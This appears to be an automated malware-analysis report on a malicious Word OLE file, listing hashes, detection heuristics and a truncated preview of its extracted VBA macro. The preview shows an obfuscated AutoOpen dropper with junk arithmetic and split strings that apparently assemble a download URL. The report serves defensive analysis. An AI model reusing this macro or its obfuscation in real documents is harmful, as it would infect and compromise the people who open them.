Office (OLE) malware analysis — malicious · 1a6afc1493e33971

MALICIOUS

Office (OLE)

246.5 KB Created: 2017-12-20 12:09:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 014ce07b6cfb5b6a83ad0aff6d88cff3 SHA-1: b5df59adffe8b8c81b67f139d2e86b41c82c7e36 SHA-256: 1a6afc1493e33971fca254cbac8d34b6b131f66d87512d0c4f63c2a0ea288613

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating an attempt to execute external commands. The presence of the 'Img.Dropper.PhishingLure' ClamAV signature and the 'Password-protected archive handoff' heuristic suggests the document is designed to trick the user into opening a password-protected archive, which likely contains a malicious payload. The VBA script's obfuscated nature and the use of Shell() point to a downloader or dropper functionality.

Heuristics 8

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.PoTaknlVGrfsvizMh7Npu� In document text (OLE body)
- http://www.PoTaknlVGrfsvizMh7NpuIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 94744 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	94744 bytes
SHA-256: `f572729f3c3b76a14c1c6956befafbc3814a1fd8285a71fe6ac83d7b98fb0ad6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "ZGvkoaBErXKoU" Sub AutoOpen() On Error Resume Next bqjruaqjU = (2772 * CStr(wtLvEjwhQviHZh * Rnd(zzJGFHkiwa)) / 1988 / ChrB(CcBisil * CBool(136465363 - CDbl(YHoBfwrchB + UQCSwahdOqLK)))) + (179478542 / Fix(982) - UBdVjhDAV * Fix(IRJziHO + Log(CjMFlAJFIKF))) XjNwahdUV = (2772 * CStr(AwlwNtAmdDVzLI * Rnd(BOQdMaZsvwW)) / 1988 / ChrB(VjQBntjCiaHXGJ * CBool(136465363 - CDbl(iHkXVETYS + rJVaGqAq)))) + (179478542 / Fix(982) - fDMBiGbGvbHsWC * Fix(ukLaBrCK + Log(ovjObckHjIiOSF))) CQtzXzLUU = (2772 * CStr(MjVfZpGd * Rnd(ONmXNfTqALOYt)) / 1988 / ChrB(iIKIuiMnTbc * CBool(136465363 - CDbl(vGEirCB + EsPtfSEGLJ)))) + (179478542 / Fix(982) - iTDqWPh * Fix(whbtKuMj + Log(mSTLWXXm))) tQcbZFbKV = (2772 * CStr(hrPiSKqCodwEzT * Rnd(sUspuMvjEdwF)) / 1988 / ChrB(ZbzjpAiswDzJ * CBool(136465363 - CDbl(UjunoQJthk + UahlLLFUEGdM)))) + (179478542 / Fix(982) - OOwoqvRtfas * Fix(lQoiwrrr + Log(OPTtjkwiE))) Application.Run "fjcwhMMztj", TWWQKzjWuiiTjc OqXQYZRUC = (2772 * CStr(TppzpZZvQmIP * Rnd(VNAzfuJLSOaL)) / 1988 / ChrB(pUrPQbo * CBool(136465363 - CDbl(YbZPdTGp + svzFBDYamZta)))) + (179478542 / Fix(982) - aOookFD * Fix(Whaiwma + Log(BbCVlWfMvnRT))) odBvjXBLb = (2772 * CStr(jBmjWOYaEQwrk * Rnd(qEOEjbswnkNsjf)) / 1988 / ChrB(ZlPHMrAjFzQoVi * CBool(136465363 - CDbl(VztCEbI + czzmOCTihscffj)))) + (179478542 / Fix(982) - YHpVJESnXOmP * Fix(ziaWQomHP + Log(mjmVjvs))) CVlNVvPFz = (2772 * CStr(KMZYbnDiDSFPq * Rnd(bICDpXjisiMQdB)) / 1988 / ChrB(iLRQwcvpjKt * CBool(136465363 - CDbl(qfdnmipmMsLQ + IbTvMLJBAUG)))) + (179478542 / Fix(982) - wuTfSWtvptCPq * Fix(mnPRqzApnB + Log(uUzjjpLWznj))) VGtWSVmOY = (2772 * CStr(EmYWmii * Rnd(nJHSEYC)) / 1988 / ChrB(LIErsqlCRIYUhf * CBool(136465363 - CDbl(YdWphaN + GjQMicDCUTYJdK)))) + (179478542 / Fix(982) - MNBWEdKKZHF * Fix(ohiUTwNwLciH + Log(NGDAIWZNwKc))) End Sub Function TWWQKzjWuiiTjc() On Error Resume Next ZQpfkZUc = (2772 * CStr(TJEviNfjrmTOri * Rnd(bqwXXWUcUFC)) / 1988 / ChrB(KNRLDCdIfo * CBool(136465363 - CDbl(XhEGltoUmiL + lNimazhkpjnU)))) + (179478542 / Fix(982) - ZaQLNawnLb * Fix(SPjjflPuzdjwU + Log(DJwEprtkk))) ZnNFUzJNz = (2772 * CStr(ADYzdbN * Rnd(LKzNwbLEHo)) / 1988 / ChrB(hdisHbLVvNzNq * CBool(136465363 - CDbl(JvYFhuRYQIQS + kPAdJlKcaRKR)))) + (179478542 / Fix(982) - SFSGLzIcoj * Fix(watYJMacptbG + Log(jpcjIjiNnMcMFJ))) snQrijfaUD = Mid("KSGv5DhoscDh+cDht cDh+cDh9dcDh+G1x+G1xcDhG'+'1x+G1xN_cDh+cDh.EG1x'+'+G1xxceptiocDh+cDhncDh+cDh.Me'+'cDh+cDhssacDh+cDhge;cDvPjjivSN", 6, 117) fRcdRpOBc = (2772 * CStr(SYJYEOza * Rnd(tTKQzFERtUss)) / 1988 / ChrB(vuKQwiVjvif * CBool(136465363 - CDbl(QHbqpkjGMb + stAwlaAPsTqcOO)))) + (179478542 / Fix(982) - QOECwlishzdaD * Fix(LmPUwRXwkkJu + Log(nEZiNcBUS))) cGpHFD = (2772 * CStr(DYSbcEUo * Rnd(OtnjTNltClalc)) / 1988 / ChrB(jshziKj * CBool(136465363 - CDbl(tJdCFRqjrz + bzLQHzjwRQP)))) + (179478542 / Fix(982) - VaYjjuEm * Fix(GuziDQHTDWt + Log(HAAXcaBBOSD))) noiZOiq = (2772 * CStr(KdLNATB * Rnd(AwfjjbIQ)) / 1988 / ChrB(RSiUtDSroHSPzC * CBool(136465363 - CDbl(tkFqnEWfj + JznGXwWzjkB)))) + (179478542 / Fix(982) - jQZsWLLisCuOn * Fix(WRcsunusjFikRI + Log(SRROEDoRuhLTAj))) bkWwStoUhNz = Mid("m5zjcVpn8AavcDh+cDhoccDh'+'+cDhatdroi'+'tdutravcDh+cDhacDh+cDhicDh+cDhlparis.c'+'Dh+cDhnetcDhG1x+G1x+cDh/ducDh+cDhCAIw6/cDh+cDh,cDhOizmj", 11, 121) KPVZXojkNj = (2772 * CStr(AHbhiHlmLzV * Rnd(LlDjZcN)) / 1988 / ChrB(VjNZXLHUCkPorV * CBool(136465363 - CDbl(wpalwkGRIfv + qWVclEII)))) + (179478542 / Fix(982) - tBJWARkakj * Fix(qHHrwqRJP + Log(FuczQzhId))) ndCGkdZWzDX = (2772 * CStr(upmwYjiOi * Rnd(SZIUvzLMWms)) / 1988 / ChrB(JhuTzwk * CBool(136465363 - CDbl(QbjpQwGF + QEJVSrRhE)))) + (179478542 / Fix(982) - jwfBNXs * Fix(FBEhkdTMqtT + Log(zsFzGhj))) TKGmRJEI = (2772 * CStr(jMKCnQPwTWqX * Rnd(iViPddvnwtEnHh)) / 1988 / ChrB(jUCRGwiizF * CBool(136465363 - CDbl(hbUqsYh + tdh ... (truncated)

SHA-256: f572729f3c3b76a14c1c6956befafbc3814a1fd8285a71fe6ac83d7b98fb0ad6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ZGvkoaBErXKoU"
Sub AutoOpen()
On Error Resume Next
bqjruaqjU = (2772 * CStr(wtLvEjwhQviHZh * Rnd(zzJGFHkiwa)) / 1988 / ChrB(CcBisil * CBool(136465363 - CDbl(YHoBfwrchB + UQCSwahdOqLK)))) + (179478542 / Fix(982) - UBdVjhDAV * Fix(IRJziHO + Log(CjMFlAJFIKF)))
XjNwahdUV = (2772 * CStr(AwlwNtAmdDVzLI * Rnd(BOQdMaZsvwW)) / 1988 / ChrB(VjQBntjCiaHXGJ * CBool(136465363 - CDbl(iHkXVETYS + rJVaGqAq)))) + (179478542 / Fix(982) - fDMBiGbGvbHsWC * Fix(ukLaBrCK + Log(ovjObckHjIiOSF)))
CQtzXzLUU = (2772 * CStr(MjVfZpGd * Rnd(ONmXNfTqALOYt)) / 1988 / ChrB(iIKIuiMnTbc * CBool(136465363 - CDbl(vGEirCB + EsPtfSEGLJ)))) + (179478542 / Fix(982) - iTDqWPh * Fix(whbtKuMj + Log(mSTLWXXm)))
tQcbZFbKV = (2772 * CStr(hrPiSKqCodwEzT * Rnd(sUspuMvjEdwF)) / 1988 / ChrB(ZbzjpAiswDzJ * CBool(136465363 - CDbl(UjunoQJthk + UahlLLFUEGdM)))) + (179478542 / Fix(982) - OOwoqvRtfas * Fix(lQoiwrrr + Log(OPTtjkwiE)))
Application.Run "fjcwhMMztj", TWWQKzjWuiiTjc
OqXQYZRUC = (2772 * CStr(TppzpZZvQmIP * Rnd(VNAzfuJLSOaL)) / 1988 / ChrB(pUrPQbo * CBool(136465363 - CDbl(YbZPdTGp + svzFBDYamZta)))) + (179478542 / Fix(982) - aOookFD * Fix(Whaiwma + Log(BbCVlWfMvnRT)))
odBvjXBLb = (2772 * CStr(jBmjWOYaEQwrk * Rnd(qEOEjbswnkNsjf)) / 1988 / ChrB(ZlPHMrAjFzQoVi * CBool(136465363 - CDbl(VztCEbI + czzmOCTihscffj)))) + (179478542 / Fix(982) - YHpVJESnXOmP * Fix(ziaWQomHP + Log(mjmVjvs)))
CVlNVvPFz = (2772 * CStr(KMZYbnDiDSFPq * Rnd(bICDpXjisiMQdB)) / 1988 / ChrB(iLRQwcvpjKt * CBool(136465363 - CDbl(qfdnmipmMsLQ + IbTvMLJBAUG)))) + (179478542 / Fix(982) - wuTfSWtvptCPq * Fix(mnPRqzApnB + Log(uUzjjpLWznj)))
VGtWSVmOY = (2772 * CStr(EmYWmii * Rnd(nJHSEYC)) / 1988 / ChrB(LIErsqlCRIYUhf * CBool(136465363 - CDbl(YdWphaN + GjQMicDCUTYJdK)))) + (179478542 / Fix(982) - MNBWEdKKZHF * Fix(ohiUTwNwLciH + Log(NGDAIWZNwKc)))
End Sub
Function TWWQKzjWuiiTjc()
On Error Resume Next
ZQpfkZUc = (2772 * CStr(TJEviNfjrmTOri * Rnd(bqwXXWUcUFC)) / 1988 / ChrB(KNRLDCdIfo * CBool(136465363 - CDbl(XhEGltoUmiL + lNimazhkpjnU)))) + (179478542 / Fix(982) - ZaQLNawnLb * Fix(SPjjflPuzdjwU + Log(DJwEprtkk)))
ZnNFUzJNz = (2772 * CStr(ADYzdbN * Rnd(LKzNwbLEHo)) / 1988 / ChrB(hdisHbLVvNzNq * CBool(136465363 - CDbl(JvYFhuRYQIQS + kPAdJlKcaRKR)))) + (179478542 / Fix(982) - SFSGLzIcoj * Fix(watYJMacptbG + Log(jpcjIjiNnMcMFJ)))
snQrijfaUD = Mid("KSGv5DhoscDh+cDht cDh+cDh9dcDh+G1x+G1xcDhG'+'1x+G1xN_cDh+cDh.EG1x'+'+G1xxceptiocDh+cDhncDh+cDh.Me'+'cDh+cDhssacDh+cDhge;cDvPjjivSN", 6, 117)
fRcdRpOBc = (2772 * CStr(SYJYEOza * Rnd(tTKQzFERtUss)) / 1988 / ChrB(vuKQwiVjvif * CBool(136465363 - CDbl(QHbqpkjGMb + stAwlaAPsTqcOO)))) + (179478542 / Fix(982) - QOECwlishzdaD * Fix(LmPUwRXwkkJu + Log(nEZiNcBUS)))
cGpHFD = (2772 * CStr(DYSbcEUo * Rnd(OtnjTNltClalc)) / 1988 / ChrB(jshziKj * CBool(136465363 - CDbl(tJdCFRqjrz + bzLQHzjwRQP)))) + (179478542 / Fix(982) - VaYjjuEm * Fix(GuziDQHTDWt + Log(HAAXcaBBOSD)))
noiZOiq = (2772 * CStr(KdLNATB * Rnd(AwfjjbIQ)) / 1988 / ChrB(RSiUtDSroHSPzC * CBool(136465363 - CDbl(tkFqnEWfj + JznGXwWzjkB)))) + (179478542 / Fix(982) - jQZsWLLisCuOn * Fix(WRcsunusjFikRI + Log(SRROEDoRuhLTAj)))
bkWwStoUhNz = Mid("m5zjcVpn8AavcDh+cDhoccDh'+'+cDhatdroi'+'tdutravcDh+cDhacDh+cDhicDh+cDhlparis.c'+'Dh+cDhnetcDhG1x+G1x+cDh/ducDh+cDhCAIw6/cDh+cDh,cDhOizmj", 11, 121)
KPVZXojkNj = (2772 * CStr(AHbhiHlmLzV * Rnd(LlDjZcN)) / 1988 / ChrB(VjNZXLHUCkPorV * CBool(136465363 - CDbl(wpalwkGRIfv + qWVclEII)))) + (179478542 / Fix(982) - tBJWARkakj * Fix(qHHrwqRJP + Log(FuczQzhId)))
ndCGkdZWzDX = (2772 * CStr(upmwYjiOi * Rnd(SZIUvzLMWms)) / 1988 / ChrB(JhuTzwk * CBool(136465363 - CDbl(QbjpQwGF + QEJVSrRhE)))) + (179478542 / Fix(982) - jwfBNXs * Fix(FBEhkdTMqtT + Log(zsFzGhj)))
TKGmRJEI = (2772 * CStr(jMKCnQPwTWqX * Rnd(iViPddvnwtEnHh)) / 1988 / ChrB(jUCRGwiizF * CBool(136465363 - CDbl(hbUqsYh + tdh
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.